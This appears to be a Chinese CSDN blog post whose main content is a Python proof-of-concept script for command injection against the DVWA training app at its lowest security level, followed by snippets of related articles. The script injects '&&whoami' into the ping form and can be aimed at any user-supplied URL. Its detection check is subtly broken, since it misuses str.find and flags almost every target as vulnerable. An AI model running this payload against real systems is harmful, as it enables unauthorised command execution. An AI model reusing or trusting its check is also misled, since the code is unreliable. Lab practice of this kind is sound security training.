poc2---dvwa命令执行【low】

于 2023-02-23 15:48:52 发布
阅读量161 收藏
点赞数
分类专栏: poc 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/129183370
版权 
# -*- coding: utf-8 -*-
"""
@Time : 2023/2/22 16:43
@Auth : aur02a
@File :命令执行poc.py
@IDE :PyCharm
@Motto:还未老,想养老,小小年纪,苦恼苦恼
"""
import requests

def postrequest(url):
    path = '/DVWA-master/vulnerabilities/exec/#'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': 'PHPSESSID=ncqd7juih083p2naa3ut0ds1h3; security=low',
    }
    data = {'ip': '127.0.0.1%26%26+whoami', 'Submit': 'Submit'}
    # data = 'ip=127.0.0.1%26%26+whoami&Submit=Submit'
    url = url + path
    # h = requests.post(url,data=data,headers=headers,proxies=proxies)
    h = requests.post(url, data=data, headers=headers)
    return h

def poc(url):
    response = postrequest(url)
    if response.text.find("9dgqor8k"):
        print(url+'\033[31m存在命令执行漏洞\033[0m')
    else:
        print(url+"不存在命令执行漏洞")

if "__main__" == __name__ :
    url = input("please enter your address:")
    poc(url)
aur03a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
poc-route-autoload
04-29
路线自动加载 本文的概念证明:
【严重】Artifex Software Ghostscript 任意命令执行漏洞(POC已公开)(CVE-2023-28879)
murphysec的博客
04-18 1251
Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript解析器。 Artifex Ghostscript 10.01.0及之前版本中,如果写入缓冲区的数据比总长度少一个字节,则尝试写入转义字符,导致两个字节被写入。攻击者可通过泄露堆中path_control_active地址,覆写无效字节以禁用沙箱,进而通过PostScript的%pipe%执行任意命令。该漏洞影响 BCPEncode, BCPDecode, TBCPEncode,
命令执行漏洞超详细讲解
qinshuoyang1的博客
08-20 5220
应用有时需要调用一些执行系统命令的函数,如PHP中的`system`、`exec`、`shell_exec`、`passthru`、`popen`、`proc_popen`等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。
命令执行poc编写
公众号shadow sock7
06-03 1067
有回显的情况下,碰到可能存在的windows和linux平台,可以执行一个不存在的命令,然后报错返回里有Cannot run program即可。 Windows: 结果:
Spring命令执行(CVE-2022-22947_POC
weixin_51721627的博客
07-11 438
CVE-2022-22947_POC
DVWA教程(一) —— Low级别
weixin_47610939的博客
04-29 1776
本篇文章为各位正在学习DVWA提供解题思路,同时也是本人的学习笔记,本文中的方法仅为验证漏洞,并无攻击目的。DVWA安装,可以使用docker容器,非常简单方便,通过以下链接: Docker Hubhttps://hub.docker.com/r/sagikazarmark/dvwa 0x01. 暴力破解 0x02. 代码注入 先看题目,是一个ping命令 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get in...
yvenone#poc-2#thinkphp5命令执行1
07-25
thinkphp5命令执行POC检测代码super(check, self).init() #继承threading类的构造方法,python3的写法super
poc-resize-images:在客户端调整图像大小
04-28
POC调整图片大小 先决条件 node.js 吞咽 安装 npm install 使用(客户) gulp launchDev POC文件API 打开fileapi.html 我们可以通过裁剪来发送几个文件 局限性 我们在上传上是异步的,因此我们粉碎了浏览器资源 ...
POC bomber -资源
11-19
POC bomber 的poc支持weblogic,tomcat,apache,jboss,nginx,struct2,thinkphp2x3x5x,spring,redis,jenkins,php语言漏洞,shiro,泛微OA,致远OA,通达OA等易受攻击组件的漏洞检测,支持调用dnslog平台检测...
DVWA靶场01-系统命令执行漏洞利用及防护(Low/Medium/Hight)
AkangBoy的博客
11-11 2902
本文主要介绍了在DVWA靶场环境下系统命令执行漏洞的利用姿势,包括Low、medium、High三个级别
Command Injection Poc(命令注入)
Websec
03-04 1435
原文:https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d 作者: NoGe 漏洞类型:命令注入 ....... 在我测试一个招聘网站的时候,非常有趣的事情是,我发现一个文件名参数可以进行注入 下面是整个漏洞复测流程: 1、首先在这个name参数处输入''sleep 5' ,发现这个响应包延迟...
DVWA全级别-双向规则编写
LainWith的博客
09-23 976
DVWA全级别-双向规则编写
无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
乐枕的家
08-04 1万+
无回显命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞及属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点: 修改了目标机的文件系统 不具有通用性,如windows没有nc、linux没有wget的情况。 涉及到TCP数据传输,执行速度慢 一种更好
H3C IMC 命令执行 Poc
soldi_er的博客
07-29 2591
文章目录漏洞复现漏洞描述FOFA搜索测试编写Poc脚本 漏洞复现 漏洞描述   H3C IMC dynamiccontent.properties.xhtm 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行。 FOFA搜索   “/imc/login.jsf” && body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" 测试   打开搜索结果第一个,页面如图。
体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC
公众号shadow sock7
09-09 3397
首先安装好docker。环境地址GitHub地址: https://github.com/Medicean/VulApps 镜像地址: https://hub.docker.com/r/medicean/vulapps/ 镜像的各种Tag: https://hub.docker.com/r/medicean/vulapps/tags/ 环境搭建获取镜像$ docker pull medi
java poc_无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
weixin_32058991的博客
02-16 624
无回显漏洞存在与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点:修改了目标机的文件系统不具有通用性,如windows没有nc、linux没有wget的情况。涉及到TCP数据传输,执行速度慢一种更好的方式是使...
编写poc和exploit的几款常用工具介绍
热门推荐
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
Pocsuite3渗透测试框架编写POC和EXP脚本
悦分享
07-07 5645
一、Pocsuite3简介编写poc和exp并不是大佬们才会的,借助于某些框架,小白也可以编写自己的poc和exp,并且实现批量刷SRC。我们这里使用Pocsuite 3 来实现自己编写脚本,Pocsuite是由”知道创宇404实验室”打造的一款开源的远程漏洞测试框架,你可以直接使用它进行漏洞的验证与利用,也可以基于它进行POC/EXP的开发Pocsuite 3用Pyhton3编写,支持verify、attack及shell三种模式,可以通过指定单个目标或者从文件中导入多个目标,使用单个POC或者POC集合
poc-yaml-go-pprof-leak
最新发布
09-11
根据引用和引用的信息,poc-yaml-go-pprof-leak是一个与pprof定位问题相关的内容。pprof是一个用于性能分析和故障排查的工具,它可以帮助我们定位代码中的问题。通过使用pprof,我们可以获取代码的性能剖析数据,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值